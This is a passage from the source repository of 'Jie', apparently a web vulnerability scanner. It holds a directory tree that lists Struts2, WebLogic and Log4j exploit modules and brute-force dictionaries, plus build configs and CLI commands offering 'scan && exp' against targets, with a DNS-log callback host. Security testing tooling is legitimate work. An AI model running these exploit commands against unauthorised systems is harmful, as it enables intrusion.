├── .github └── workflows │ └── release-binary.yml ├── .gitignore ├── .goreleaser ├── linux.yml ├── mac.yml └── windows.yml ├── 1.html ├── LICENSE ├── Makefile ├── README.md ├── README_CN.md ├── SCopilot ├── templates │ ├── SCopilot.html │ ├── about.html │ ├── config.html │ └── index.html └── web.go ├── cmd ├── apollo.go ├── fastjson.go ├── log4j.go ├── other.go ├── root.go ├── shiro.go ├── struts2.go ├── weblogic.go └── webscan.go ├── conf ├── banner.go ├── config.go ├── default.go ├── envCheck.go ├── file.go └── type.go ├── crawler ├── crawlergo.go ├── crawlergo │ ├── config │ │ ├── config.go │ │ └── config_test.go │ ├── domain_collect.go │ ├── engine │ │ ├── after_dom_tasks.go │ │ ├── after_loaded_tasks.go │ │ ├── browser.go │ │ ├── collect_links.go │ │ ├── intercept_request.go │ │ ├── tab.go │ │ └── tab_test.go │ ├── filter │ │ ├── filter.go │ │ ├── simple_filter.go │ │ ├── smart_filter.go │ │ └── smart_filter_test.go │ ├── js │ │ └── javascript.go │ ├── model │ │ ├── request.go │ │ ├── url.go │ │ └── url_test.go │ ├── path_expansion.go │ ├── task_main.go │ ├── taskconfig.go │ ├── taskconfig_test.go │ ├── tools │ │ ├── common.go │ │ ├── random.go │ │ └── requests │ │ │ ├── requests.go │ │ │ ├── response.go │ │ │ └── utils.go │ └── xss │ │ ├── dom.go │ │ └── preload.js ├── katana.go └── katana_test.go ├── fingprints ├── fingprints.go ├── fingprints_test.go ├── framework │ ├── ApacheJackrabbit.go │ ├── AspMvc.go │ ├── CakePHP.go │ ├── CherryPy.go │ ├── CodeIgniter.go │ ├── Dancer.go │ ├── Django.go │ ├── Flask.go │ ├── FuelPHP.go │ ├── Grails.go │ ├── Horde.go │ ├── Karrigell.go │ ├── Laravel.go │ ├── Nette.go │ ├── Phalcon.go │ ├── Play.go │ ├── Rails.go │ ├── Seagull.go │ ├── Spring.go │ ├── Symfony.go │ ├── Web2Py.go │ ├── Yii.go │ ├── Zend.go │ └── beego.go ├── os │ ├── CentOS.go │ ├── Darwin.go │ ├── Debian.go │ ├── Fedora.go │ ├── FreeBSD.go │ ├── Gentoo.go │ ├── RedHat.go │ ├── SUSE.go │ ├── Scientific.go │ ├── SunOS.go │ ├── UNIX.go │ ├── Ubuntu.go │ ├── 
WindowsCE.go │ └── WindowsServer.go ├── plugins.go ├── programing │ ├── AsciiDoc.go │ ├── Asp.go │ ├── Erlang.go │ ├── Java.go │ ├── Lua.go │ ├── PHP.go │ ├── Perl.go │ ├── Python.go │ └── Ruby.go └── type.go ├── go.mod ├── go.sum ├── images ├── image-20231011213912055.png ├── image-20240101121809597.png ├── image-20240101121931631.png ├── image-20240101121957058.png └── passive-scan-client.png ├── lib.go ├── lib └── cdncheck │ ├── LICENSE.md │ ├── README.md │ ├── cdncheck.go │ ├── cdncheck_test.go │ ├── generate │ ├── input.go │ ├── options.go │ ├── ranges.go │ └── types.go │ ├── other.go │ ├── other_test.go │ ├── sources_data.go │ ├── sources_data.json │ └── types.go ├── main.go ├── pkg ├── ast │ ├── ast_parser.go │ ├── htmlparser.go │ ├── jscontext.go │ └── tree.go ├── input │ └── input.go ├── mitmproxy │ ├── README.md │ ├── go-mitmproxy.go │ ├── go-mitmproxy │ │ ├── LICENSE │ │ ├── README.md │ │ ├── README_CN.md │ │ ├── addon │ │ │ ├── decoder.go │ │ │ ├── dumper.go │ │ │ ├── maplocal.go │ │ │ ├── mapremote.go │ │ │ └── mapremote_test.go │ │ ├── cert │ │ │ ├── cert.go │ │ │ └── cert_test.go │ │ ├── helper │ │ │ ├── helper.go │ │ │ ├── host.go │ │ │ ├── host_test.go │ │ │ ├── proxy.go │ │ │ └── tls.go │ │ └── proxy │ │ │ ├── addon.go │ │ │ ├── attacker.go │ │ │ ├── connection.go │ │ │ ├── connection_test.go │ │ │ ├── entry.go │ │ │ ├── flow.go │ │ │ ├── flowencoding.go │ │ │ ├── helper.go │ │ │ ├── proxy.go │ │ │ ├── proxy_test.go │ │ │ └── websocket.go │ ├── passive.go │ ├── task.go │ └── util.go ├── mode │ ├── active.go │ └── passive.go ├── output │ ├── SCopilot.go │ ├── output.go │ ├── progress.go │ ├── report.go │ ├── screen.go │ ├── type.go │ └── vulnReport.html ├── protocols │ └── httpx │ │ ├── fuzz.go │ │ ├── proxy.go │ │ ├── request.go │ │ └── util.go ├── reverse │ ├── dig_pm.go │ └── dnslog_cn.go ├── task │ ├── scan.go │ └── task.go └── util │ ├── cdnCheck.go │ ├── codec.go │ ├── file.go │ ├── iconhash.go │ ├── parameter.go │ ├── rand.go │ ├── regexp.go 
│ ├── string.go │ ├── uniqueness.go │ ├── url.go │ └── util.go ├── scan ├── PerFile │ ├── cmdinject │ │ └── cmdinject.go │ ├── fastjson │ │ ├── Detect │ │ │ └── detect.go │ │ ├── LICENSE │ │ ├── README.md │ │ ├── Utils │ │ │ ├── factory.go │ │ │ ├── struct.go │ │ │ └── templates.go │ │ └── fastjson.go │ ├── jsonp │ │ └── jsonp.go │ ├── sql │ │ ├── bool.go │ │ ├── error.go │ │ ├── heuristic.go │ │ ├── images │ │ │ └── image-20230207205442610.png │ │ ├── sql.go │ │ ├── sql.md │ │ ├── sql_test.go │ │ ├── sqlmap │ │ │ ├── sqlmap.go │ │ │ └── type.go │ │ ├── time.go │ │ ├── union.go │ │ ├── util.go │ │ └── xml │ │ │ └── errors.xml │ ├── ssrf │ │ └── ssrf.go │ ├── xss │ │ ├── dom │ │ │ ├── dom.go │ │ │ ├── fuzz.go │ │ │ └── hookparse.go │ │ ├── prototype.go │ │ ├── syntaxAnalysis.go │ │ ├── xss.go │ │ └── xss.md │ └── xxe │ │ └── xxe.go ├── PerFolder │ ├── crlf │ │ └── crlf.go │ ├── iis │ │ └── iis.go │ ├── log4j │ │ └── log4j.go │ └── traversal │ │ ├── README.md │ │ ├── nginxAliasTraversal.go │ │ └── traversal_test.go ├── PerServer │ ├── nuclei.go │ ├── portScan │ │ ├── masscan │ │ │ └── masscan.go │ │ ├── portScan.go │ │ └── scan.go │ └── waybackarchive.go ├── Pocs │ ├── apollo │ │ ├── apollo.go │ │ └── apollo_test.go │ ├── java │ │ ├── shiro │ │ │ ├── CVE_2016_4437.go │ │ │ ├── dicts │ │ │ │ └── keys.txt │ │ │ ├── exploit.go │ │ │ └── gadget.go │ │ ├── struts2 │ │ │ ├── README.md │ │ │ ├── s2-001 │ │ │ │ └── s2-001.go │ │ │ ├── s2-005 │ │ │ │ └── s2-005.go │ │ │ ├── s2-007 │ │ │ │ └── s2-007.go │ │ │ ├── s2-008 │ │ │ │ └── s2-008.go │ │ │ ├── s2-009 │ │ │ │ └── s2-009.go │ │ │ ├── s2-012 │ │ │ │ └── s2-012.go │ │ │ ├── s2-013 │ │ │ │ └── s2-013.go │ │ │ ├── s2-015 │ │ │ │ └── s2-015.go │ │ │ ├── s2-016 │ │ │ │ └── s2-016.go │ │ │ ├── s2-045 │ │ │ │ └── s2-045.go │ │ │ ├── s2-046 │ │ │ │ └── s2-046.go │ │ │ ├── s2-048 │ │ │ │ └── s2-048.go │ │ │ ├── s2-053 │ │ │ │ └── s2-053.go │ │ │ ├── s2-057 │ │ │ │ └── s2-057.go │ │ │ ├── struts2.go │ │ │ └── utils │ │ │ │ └── 
utils.go │ │ └── weblogic │ │ │ ├── CVE_2014_4210.go │ │ │ ├── CVE_2017_10271.go │ │ │ ├── CVE_2017_3506.go │ │ │ ├── CVE_2018_2894.go │ │ │ ├── CVE_2019_2725.go │ │ │ ├── CVE_2019_2729.go │ │ │ ├── CVE_2020_14882.go │ │ │ ├── CVE_2020_14883.go │ │ │ ├── CVE_2020_2883.go │ │ │ └── CVE_2021_2109.go │ ├── nuclei │ │ ├── nuclei.go │ │ ├── nuclei_test.go │ │ ├── proxy.go │ │ ├── template.go │ │ ├── templates.go │ │ ├── update.go │ │ ├── util.go │ │ └── versioncheck.go │ ├── oa │ │ ├── seeyon │ │ │ ├── BackdoorScan.go │ │ │ ├── CNVD_2019_19299.go │ │ │ ├── CNVD_2020_62422.go │ │ │ ├── CNVD_2021_01627.go │ │ │ ├── CreateMysql.go │ │ │ ├── DownExcelBeanServlet.go │ │ │ ├── GetSessionList.go │ │ │ ├── InitDataAssess.go │ │ │ ├── ManagementStatus.go │ │ │ ├── SeeyonFastjson.go │ │ │ ├── SessionUpload.go │ │ │ └── sql.go │ │ └── yongyou │ │ │ └── nc │ │ │ └── nc.go │ └── pocs_go │ │ ├── ThinkPHP │ │ └── check.go │ │ ├── fastjson │ │ ├── check.go │ │ └── payloads.go │ │ ├── go_poc_check.go │ │ ├── jboss │ │ └── CVE_2017_12149.go │ │ ├── jenkins │ │ ├── CVE_2018_1000110.go │ │ ├── CVE_2018_1000861.go │ │ ├── CVE_2019_1003000.go │ │ └── Unauthorized.go │ │ ├── log4j │ │ ├── payload.go │ │ └── scan.go │ │ ├── phpunit │ │ └── CVE_2017_9841.go │ │ └── tomcat │ │ ├── CVE_2017_12615.go │ │ └── CVE_2020_1938.go ├── bbscan │ ├── README.md │ ├── bbscan.go │ ├── bbscan_test.go │ ├── dicts.go │ ├── fuzzfingerprints.go │ └── rules │ │ ├── black.list │ │ ├── compressed_backup_files.txt │ │ ├── config_file.txt │ │ ├── dangerous_directory.txt │ │ ├── directory_traversal.txt │ │ ├── druid.txt │ │ ├── git_and_svn.txt │ │ ├── go_pprof_debug.txt │ │ ├── java_server_faces2.txt │ │ ├── java_web_config_files.txt │ │ ├── phpinfo_or_apc.txt │ │ ├── phpmyadmin.txt │ │ ├── resin_admin.txt │ │ ├── safetyEquipment.txt │ │ ├── sensitive_url.txt │ │ ├── shell_script_disclosure.txt │ │ ├── source_code_disclosure.txt │ │ ├── springboot.txt │ │ ├── ssh_sensitive_file.txt │ │ ├── test_page.txt │ │ ├── 
tomcat_manager.txt │ │ └── web_editors.txt ├── gadget │ ├── README.md │ ├── brute │ │ ├── admin_brute.go │ │ ├── basic_brute.go │ │ ├── check_loginpage.go │ │ ├── dicts.go │ │ ├── dicts │ │ │ ├── jbossuserpass.txt │ │ │ ├── tomcatuserpass.txt │ │ │ ├── top100pass.txt │ │ │ └── weblogicuserpass.txt │ │ ├── hydra.go │ │ ├── hydra │ │ │ ├── dict.go │ │ │ ├── ftp.go │ │ │ ├── memcached.go │ │ │ ├── mongodb.go │ │ │ ├── mysql.go │ │ │ ├── oracle.go │ │ │ ├── postgresql.go │ │ │ ├── rdp.go │ │ │ ├── redis.go │ │ │ ├── smb.go │ │ │ ├── sqlserver.go │ │ │ ├── ssh.go │ │ │ └── util.go │ │ ├── jboss_brute.go │ │ ├── tomcat_brute.go │ │ └── weblogic_brute.go │ ├── bypass403 │ │ ├── 403bypass.go │ │ └── dict │ │ │ ├── endpaths.txt │ │ │ ├── headers.txt │ │ │ ├── httpmethods.txt │ │ │ ├── ips.txt │ │ │ ├── midpaths.txt │ │ │ └── simpleheaders.txt │ ├── collection │ │ ├── README.md │ │ ├── collection.go │ │ └── sensitive.go │ ├── jwt │ │ ├── jwt.go │ │ └── secrets.txt │ ├── sensitive │ │ ├── error.go │ │ ├── key.go │ │ ├── keys │ │ │ ├── adafruit-key.yaml │ │ │ ├── adobe │ │ │ │ ├── adobe-client.yaml │ │ │ │ └── adobe-secret.yaml │ │ │ ├── age │ │ │ │ ├── age-identity-secret-key.yaml │ │ │ │ └── age-recipient-public-key.yaml │ │ │ ├── airtable-key.yaml │ │ │ ├── algolia-key.yaml │ │ │ ├── alibaba │ │ │ │ ├── alibaba-key-id.yaml │ │ │ │ └── alibaba-secret-id.yaml │ │ │ ├── amazon │ │ │ │ ├── amazon-account-id.yaml │ │ │ │ ├── amazon-mws-auth-token.yaml │ │ │ │ ├── amazon-session-token.yaml │ │ │ │ ├── amazon-sns-token.yaml │ │ │ │ ├── aws-access-id.yaml │ │ │ │ └── aws-cognito.yaml │ │ │ ├── asana │ │ │ │ ├── asana-clientid.yaml │ │ │ │ └── asana-clientsecret.yaml │ │ │ ├── atlassian │ │ │ │ └── atlassian-api-token.yaml │ │ │ ├── azure │ │ │ │ └── azure-connection-string.yaml │ │ │ ├── beamer-api-token.yaml │ │ │ ├── bitbucket │ │ │ │ ├── bitbucket-client-id.yaml │ │ │ │ └── bitbucket-client-secret.yaml │ │ │ ├── bittrex │ │ │ │ ├── bittrex-access-key.yaml │ │ │ │ └── 
bittrex-secret-key.yaml │ │ │ ├── branch-key.yaml │ │ │ ├── clojars-api-token.yaml │ │ │ ├── cloudinary.yaml │ │ │ ├── code-climate-token.yaml │ │ │ ├── codecov-access-token.yaml │ │ │ ├── coinbase-access-token.yaml │ │ │ ├── confluent │ │ │ │ ├── confluent-access-token.yaml │ │ │ │ └── confluent-secret-token.yaml │ │ │ ├── contentful-api-token.yaml │ │ │ ├── cratesio-api-key.yaml │ │ │ ├── credential-exposure-file.yaml │ │ │ ├── credentials.yaml │ │ │ ├── databricks-api-token.yaml │ │ │ ├── datadog-access-token.yaml │ │ │ ├── dependency │ │ │ │ └── dependency-track.yaml │ │ │ ├── digitalocean │ │ │ │ ├── digitalocean-access-token.yaml │ │ │ │ ├── digitalocean-personal-access.yaml │ │ │ │ └── digitalocean-refresh-token.yaml │ │ │ ├── discord │ │ │ │ ├── discord-api-token.yaml │ │ │ │ ├── discord-cilent-secret.yaml │ │ │ │ └── discord-client-id.yaml │ │ │ ├── docker │ │ │ │ └── dockerhub-pat.yaml │ │ │ ├── doppler-api-token.yaml │ │ │ ├── doppler │ │ │ │ ├── doppler-audit.yaml │ │ │ │ ├── doppler-cli.yaml │ │ │ │ ├── doppler-scim.yaml │ │ │ │ ├── doppler-service-account.yaml │ │ │ │ └── doppler-service.yaml │ │ │ ├── droneci-access-token.yaml │ │ │ ├── dropbox │ │ │ │ ├── dropbox-access.yaml │ │ │ │ ├── dropbox-api-token.yaml │ │ │ │ ├── dropbox-longlived-token.yaml │ │ │ │ └── dropbox-shortlived-token.yaml │ │ │ ├── duffel-api-token.yaml │ │ │ ├── dynatrace-token.yaml │ │ │ ├── easypost │ │ │ │ ├── easypost-api-token.yaml │ │ │ │ └── easypost-test-token.yaml │ │ │ ├── etsy-access-token.yaml │ │ │ ├── facebook │ │ │ │ ├── facebook-api-token.yaml │ │ │ │ ├── facebook-client-id.yaml │ │ │ │ ├── facebook-secret.yaml │ │ │ │ └── fb-access-token.yaml │ │ │ ├── fastly-api-token.yaml │ │ │ ├── fcm-api-key.yaml │ │ │ ├── figma-access-token.yaml │ │ │ ├── finicity │ │ │ │ ├── finicity-api-token.yaml │ │ │ │ └── finicity-client-secret.yaml │ │ │ ├── finnhub-access-token.yaml │ │ │ ├── firebase-database.yaml │ │ │ ├── flickr-access-token.yaml │ │ │ ├── flutter │ │ │ │ ├── 
flutterwave-encryption-key.yaml │ │ │ │ ├── flutterwave-public-key.yaml │ │ │ │ └── flutterwave-secret-key.yaml │ │ │ ├── frameio-api-token.yaml │ │ │ ├── freshbooks-access-token.yaml │ │ │ ├── gcp-service-account.yaml │ │ │ ├── github │ │ │ │ ├── github-app-token.yaml │ │ │ │ ├── github-oauth-token.yaml │ │ │ │ ├── github-outdated-key.yaml │ │ │ │ ├── github-personal-token.yaml │ │ │ │ └── github-refresh-token.yaml │ │ │ ├── gitlab │ │ │ │ ├── gitlab-personal-accesstoken.yaml │ │ │ │ ├── gitlab-pipeline-triggertoken.yaml │ │ │ │ └── gitlab-runner-regtoken.yaml │ │ │ ├── gitter-access-token.yaml │ │ │ ├── gocardless-api-token.yaml │ │ │ ├── google │ │ │ │ ├── google-api.yaml │ │ │ │ ├── google-clientid.yaml │ │ │ │ └── google-oauth-clientsecret.yaml │ │ │ ├── grafana │ │ │ │ ├── grafana-api-key.yaml │ │ │ │ ├── grafana-cloud-api-token.yaml │ │ │ │ └── grafana-service-account-token.yaml │ │ │ ├── hashicorp-api-token.yaml │ │ │ ├── heroku-key.yaml │ │ │ ├── huggingface │ │ │ │ └── huggingface-user-access.yaml │ │ │ ├── jenkins-token.yaml │ │ │ ├── kubernetes │ │ │ │ ├── kubernetes-dockercfg-secret.yaml │ │ │ │ └── kubernetes-dockerconfigjson-secret.yaml │ │ │ ├── linkedin-id.yaml │ │ │ ├── linkedin │ │ │ │ ├── linkedin-client.yaml │ │ │ │ └── linkedin-secret.yaml │ │ │ ├── mailchimp-api.yaml │ │ │ ├── mailgun-api.yaml │ │ │ ├── mapbox-token.yaml │ │ │ ├── newrelic │ │ │ │ ├── newrelic-api-service.yaml │ │ │ │ ├── newrelic-license-non.yaml │ │ │ │ ├── newrelic-license.yaml │ │ │ │ ├── newrelic-pixie-apikey.yaml │ │ │ │ └── newrelic-pixie-deploykey.yaml │ │ │ ├── npm-accesstoken.yaml │ │ │ ├── nuget-key.yaml │ │ │ ├── odbc │ │ │ │ └── odbc-connection.yaml │ │ │ ├── okta │ │ │ │ └── okta-api.yaml │ │ │ ├── openai-key.yaml │ │ │ ├── particle │ │ │ │ └── particle-access.yaml │ │ │ ├── paypal-braintree-token.yaml │ │ │ ├── pictatic-api-key.yaml │ │ │ ├── postman-api-key.yaml │ │ │ ├── private-key.yaml │ │ │ ├── pypi-token.yaml │ │ │ ├── razorpay-client-id.yaml │ │ │ ├── 
react │ │ │ │ ├── reactapp-password.yaml │ │ │ │ └── reactapp-username.yaml │ │ │ ├── rubygems-key.yaml │ │ │ ├── s3-bucket.yaml │ │ │ ├── salesforce │ │ │ │ └── salesforce-access.yaml │ │ │ ├── sauce-access-token.yaml │ │ │ ├── segment-public-api.yaml │ │ │ ├── sendgrid-api.yaml │ │ │ ├── shopify-custom-token.yaml │ │ │ ├── shopify-private-token.yaml │ │ │ ├── shopify-public-access.yaml │ │ │ ├── shopify-shared-secret.yaml │ │ │ ├── shopify-token.yaml │ │ │ ├── slack-api.yaml │ │ │ ├── slack-webhook.yaml │ │ │ ├── square-access-token.yaml │ │ │ ├── square-oauth-secret.yaml │ │ │ ├── stackhawk-api-key.yaml │ │ │ ├── stripe-api-key.yaml │ │ │ ├── telegram-token.yaml │ │ │ ├── thingsboard │ │ │ │ └── thingsboard-access.yaml │ │ │ ├── truenas │ │ │ │ └── truenas-api.yaml │ │ │ ├── twilio-api.yaml │ │ │ ├── twitter │ │ │ │ ├── twitter-client.yaml │ │ │ │ └── twitter-secret.yaml │ │ │ ├── wireguard │ │ │ │ ├── wireguard-preshared.yaml │ │ │ │ └── wireguard-private.yaml │ │ │ ├── zapier-webhook.yaml │ │ │ └── zendesk-secret-key.yaml │ │ ├── sensitive.go │ │ ├── sensitive.md │ │ ├── wih.go │ │ └── wih.yml │ ├── swagger │ │ ├── swagger.go │ │ └── swagger_test.go │ ├── waf │ │ ├── waf-detect.go │ │ └── waf-detect.yaml │ └── waybackarchive │ │ └── waybackarchive.go ├── plugins.go ├── type.go └── util │ └── black.go └── test ├── ast_test.go ├── cdncheck_test.go ├── crawler_test.go ├── jie_test.go ├── jsluice_test.go ├── passive_test.go ├── vulnReport_test.go ├── vulnerability_report.html ├── web_test.go └── xss_test.go /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.db 3 | .idea 4 | logs 5 | data 6 | Jie_config.yaml 7 | scan/bbscan/rules/personal_rules.txt 8 | .DS_Store 9 | test.go 10 | # Test binary, built with `go test -c` 11 | *.test 12 | 13 | # Output of the go coverage tool, specifically when used with LiteIDE 14 | *.out 15 | 
-------------------------------------------------------------------------------- /.goreleaser/linux.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | project_name: Jie 5 | builds: 6 | - id: Jie-linux 7 | ldflags: 8 | - -s -w 9 | binary: Jie 10 | env: 11 | - CGO_ENABLED=1 12 | main: ./main.go 13 | goos: 14 | - linux 15 | goarch: 16 | - amd64 17 | # - arm64 18 | archives: 19 | - format: zip 20 | name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}' 21 | 22 | checksum: 23 | name_template: "{{ .ProjectName }}-linux-checksums.txt" 24 | -------------------------------------------------------------------------------- /.goreleaser/mac.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | project_name: Jie 5 | builds: 6 | - id: Jie-darwin 7 | ldflags: 8 | - -s -w 9 | binary: Jie 10 | env: 11 | - CGO_ENABLED=1 12 | main: ./main.go 13 | goos: 14 | - darwin 15 | goarch: 16 | - amd64 17 | - arm64 18 | archives: 19 | - format: zip 20 | name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end }}_{{ .Arch }}' 21 | 22 | checksum: 23 | name_template: "{{ .ProjectName }}-mac-checksums.txt" 24 | -------------------------------------------------------------------------------- /.goreleaser/windows.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | project_name: Jie 5 | builds: 6 | - id: Jie-windows 7 | ldflags: 8 | - -s -w 9 | binary: Jie 10 | env: 11 | - CGO_ENABLED=1 # necessary only with winpcap 12 | main: ./main.go 13 | goos: 14 | - windows 15 | goarch: 16 | - amd64 17 | # - arm64 18 | # - 386 19 | archives: 20 | - format: zip 21 | name_template: '{{ .ProjectName }}_{{ .Version }}_{{ if eq .Os "darwin" }}macOS{{ else }}{{ .Os }}{{ end 
}}_{{ .Arch }}' 22 | 23 | checksum: 24 | name_template: "{{ .ProjectName }}-windows-checksums.txt" 25 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # SScan version 2 | VERSION=$(shell cat conf/banner.go |grep "const Version ="|cut -d"\"" -f2) 3 | # Output File Location 4 | DIR=data/v${VERSION} 5 | $(shell mkdir -p ${DIR}) 6 | # go build flags 删除符号表和调试信息,减小生成文件的大小 7 | LDFLAGS=-ldflags "-s -w" 8 | 9 | default: 10 | export CGO_ENABLED=1;go build ${LDFLAGS} -o ${DIR}/Jie main.go 11 | 12 | # 会在程序奔溃时生成 coredump 文件,可以使用 https://github.com/go-delve/delve 工具调试 13 | debug: 14 | export CGO_ENABLED=1;go build -o ${DIR}/Jie main.go; ulimit -c unlimited; export GOTRACEBACK=crash 15 | 16 | # clean 17 | clean: 18 | rm -rf ${DIR} -------------------------------------------------------------------------------- /cmd/apollo.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | 6 | "github.com/yhy0/Jie/conf" 7 | "github.com/yhy0/Jie/scan/Pocs/apollo" 8 | ) 9 | 10 | /** 11 | @author yhy 12 | @since 2023/8/20 13 | @desc //TODO 14 | **/ 15 | 16 | var ( 17 | as string 18 | cs string 19 | ) 20 | 21 | var apolloCmd = &cobra.Command{ 22 | Use: "apollo", 23 | Short: "apollo scan && exp", 24 | Run: func(cmd *cobra.Command, args []string) { 25 | as = conf.GlobalConfig.Options.Target 26 | apollo.Run(as, cs) 27 | }, 28 | } 29 | 30 | func apolloCmdInit() { 31 | rootCmd.AddCommand(apolloCmd) 32 | apolloCmd.Flags().StringVarP(&as, "as", "a", "", "adminService url(-t)") 33 | apolloCmd.Flags().StringVarP(&cs, "cs", "c", "", "configService, spring Eureka url") 34 | apolloCmd.MarkFlagRequired("cs") 35 | } 36 | -------------------------------------------------------------------------------- /cmd/fastjson.go: 
-------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | "github.com/yhy0/Jie/conf" 6 | "github.com/yhy0/Jie/pkg/protocols/httpx" 7 | "github.com/yhy0/Jie/scan/PerFile/fastjson" 8 | ) 9 | 10 | /** 11 | @author yhy 12 | @since 2023/8/19 13 | @desc //TODO 14 | **/ 15 | 16 | var fastjsonCmd = &cobra.Command{ 17 | Use: "fastjson", 18 | Short: "fastjson scan && exp", 19 | Run: func(cmd *cobra.Command, args []string) { 20 | for _, target := range conf.GlobalConfig.Options.Targets { 21 | fastjson.Scan(target, httpx.NewClient(nil)) 22 | } 23 | 24 | }, 25 | } 26 | 27 | func fastjsonCmdInit() { 28 | rootCmd.AddCommand(fastjsonCmd) 29 | } 30 | -------------------------------------------------------------------------------- /cmd/log4j.go: -------------------------------------------------------------------------------- 1 | package cmd 2 | 3 | import ( 4 | "github.com/spf13/cobra" 5 | "github.com/yhy0/Jie/conf" 6 | "github.com/yhy0/Jie/pkg/protocols/httpx" 7 | "github.com/yhy0/Jie/scan/Pocs/pocs_go/log4j" 8 | ) 9 | 10 | /** 11 | @author yhy 12 | @since 2023/8/19 13 | @desc //TODO 14 | **/ 15 | 16 | var log4jCmd = &cobra.Command{ 17 | Use: "log4j", 18 | Short: "log4j scan && exp", 19 | Run: func(cmd *cobra.Command, args []string) { 20 | for _, target := range conf.GlobalConfig.Options.Targets { 21 | log4j.Scan(target, "GET", "", httpx.NewClient(nil)) 22 | } 23 | 24 | }, 25 | } 26 | 27 | func log4jCmdInit() { 28 | rootCmd.AddCommand(log4jCmd) 29 | log4jCmd.Flags().StringVarP(&conf.GlobalConfig.Reverse.Host, "host", "h", "https://dig.pm", "dns host") 30 | log4jCmd.Flags().StringVarP(&domain, "domain", "d", "", "domain ") 31 | } 32 | -------------------------------------------------------------------------------- /conf/banner.go: -------------------------------------------------------------------------------- 1 | package conf 2 | 3 | /** 4 | @author: yhy 5 | @since: 2023/1/27 6 | @desc: //TODO 
7 | **/ 8 | 9 | var Banner = ` 10 | ██╗██╗███████╗ 11 | ██║██║██╔════╝ 12 | ██║██║█████╗ 13 | ██ ██║██║██╔══╝ 14 | ╚█████╔╝██║███████╗ 15 | ╚════╝ ╚═╝╚══════╝ 16 | ` 17 | 18 | const Website = "https://github.com/yhy0/Jie" 19 | 20 | const Version = "1.2.0" 21 | -------------------------------------------------------------------------------- /conf/config.go: -------------------------------------------------------------------------------- 1 | package conf 2 | 3 | import ( 4 | folderutil "github.com/projectdiscovery/utils/folder" 5 | wappalyzer "github.com/projectdiscovery/wappalyzergo" 6 | "path/filepath" 7 | ) 8 | 9 | /** 10 | @author: yhy 11 | @since: 2023/2/1 12 | @desc: //TODO 13 | **/ 14 | 15 | var GlobalConfig = &Config{} 16 | 17 | var ConfigFile string 18 | 19 | var NoProgressBar bool 20 | 21 | // FilePath 一些配置文件的默认位置 22 | var FilePath string 23 | 24 | var Wappalyzer *wappalyzer.Wappalyze 25 | 26 | func init() { 27 | homedir := folderutil.HomeDirOrDefault("") 28 | 29 | userCfgDir := filepath.Join(homedir, ".config") 30 | 31 | FilePath = filepath.Join(userCfgDir, "Jie") 32 | } 33 | -------------------------------------------------------------------------------- /crawler/crawlergo/config/config_test.go: -------------------------------------------------------------------------------- 1 | package config_test 2 | 3 | import ( 4 | "github.com/yhy0/Jie/crawler/crawlergo/config" 5 | "testing" 6 | 7 | "github.com/stretchr/testify/assert" 8 | ) 9 | 10 | func TestStaticSuffix(t *testing.T) { 11 | assert.Equal(t, true, config.StaticSuffixSet.Contains("png")) 12 | assert.Equal(t, false, config.StaticSuffixSet.Contains("demo")) 13 | 14 | assert.Equal(t, true, config.ScriptSuffixSet.Contains("asp")) 15 | assert.Equal(t, false, config.ScriptSuffixSet.Contains("demo")) 16 | } 17 | -------------------------------------------------------------------------------- /crawler/crawlergo/engine/tab_test.go: -------------------------------------------------------------------------------- 
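package engine_test

import (
	"sync"
	"testing"
	"time"
)

// TestChannel starts three goroutines that each sleep for five seconds and
// fails if they have not all finished within ten seconds.
func TestChannel(t *testing.T) {
	var wg sync.WaitGroup

	// Ranging over a three-character string gives three iterations.
	for range "..." {
		wg.Add(1)
		go func() {
			defer wg.Done()
			t.Log("=====> go func")
			time.Sleep(time.Second * 5)
			t.Log("go func done! <<<<========")
		}()
	}

	// wg.Wait must run in its own goroutine. If it is called while the select
	// cases are being evaluated, the select blocks until every worker is done
	// and the timeout branch can never be chosen.
	waitDone := func() <-chan struct{} {
		ch := make(chan struct{})
		go func() {
			defer close(ch)
			wg.Wait()
		}()
		return ch
	}

	select {
	case <-waitDone():
		t.Log("all goroutine done")
	case <-time.After(time.Second * 10):
		t.Error("timeout")
	}
}

--------------------------------------------------------------------------------
/crawler/crawlergo/filter/filter.go:
--------------------------------------------------------------------------------
package filter

import (
	"github.com/yhy0/Jie/crawler/crawlergo/model"
)

// Handler is the interface implemented by the crawler's request filters.
// NOTE(review): whether a true result means "drop the request" or "keep it" is
// not visible in this file; confirm against the implementations.
type Handler interface {
	DoFilter(req *model.Request) bool
}

--------------------------------------------------------------------------------
/crawler/crawlergo/tools/requests/response.go:
--------------------------------------------------------------------------------
package requests

import (
	"github.com/yhy0/logging"
	"io/ioutil"
	"net/http"
)

// Response wraps http.Response and adds the body decoded as text.
type Response struct {
	http.Response
	// raw text Response
	Text string
}

// getTextFromResp reads the whole response body, closes it, and returns it as
// a string. A read error is logged at debug level and whatever was read before
// the error is still returned.
//
// NOTE(review): the body comes from a crawled server and is read without a
// size limit, so a very large or endless response is held in memory in full.
// Consider capping the read (for example with io.LimitReader) at a size the
// callers can accept.
func getTextFromResp(r *http.Response) string {
	// TODO: charset conversion
	if r.Body == nil {
		return ""
	}
	// Close on every path, including the empty-body early return below, so the
	// underlying connection is released.
	defer func() { _ = r.Body.Close() }()

	if r.ContentLength == 0 {
		return ""
	}
	b, err := ioutil.ReadAll(r.Body)
	if err != nil {
		logging.Logger.Debug("get response body err ", err)
	}
	return string(b)
}

// NewResponse copies r into a Response and fills Text from its body. The body
// of r has been consumed and closed when NewResponse returns.
func NewResponse(r *http.Response) *Response {
	return &Response{
		Response: *r,
		Text:     getTextFromResp(r),
	}
}

--------------------------------------------------------------------------------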
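/crawler/crawlergo/tools/requests/utils.go:
--------------------------------------------------------------------------------
package requests

import (
	"github.com/pkg/errors"
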